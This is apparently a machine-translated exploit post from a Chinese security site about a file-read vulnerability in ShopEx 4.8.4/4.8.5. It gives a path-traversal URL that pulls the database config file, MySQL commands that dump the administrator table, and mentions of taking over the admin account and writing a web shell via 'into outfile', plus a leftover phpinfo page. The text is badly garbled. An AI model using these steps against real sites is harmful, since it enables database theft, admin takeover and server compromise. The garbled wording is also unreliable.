Shopex V4. 8. 4|V4. 8. 5 download an arbitrary file vulnerability-vulnerability warning-the black bar safety net

2013-10-24T00:00:00
ID MYHACK58:62201341038
Type myhack58
Reporter 佚名
Modified 2013-10-24T00:00:00

Description

The use of the premise is to program the application to the database server and if possible even outside, this is critical.

Your engage in Station time to meet with the station, online can't find the version of the vulnerability, their own get back to the source to read a bit.

Find a loophole, or issued to it.

Read an arbitrary file vulnerability:

http://www.target.com/shopadmin/index.php?ctl=sfile&act=getDB&p[0]=../../config/config.php

Copy the code can be connected on the database.

mysql-h1. 1..1.1-uuser-ppass

use yourbasename;

select * from sdb_operators;

Give the administrator user a password./ shopadmin/ landing

I tested the station, the direct use of the into outfile a shell.

Online has a post that says can blast the physical path, the test is not available.

If the install directory is not deleted, the following this can see phpinfo

http://www.xx.com/install/svinfo.php?phpinfo=true

Copy the code in addition the/home/cache/directory of the file, but also can burst to.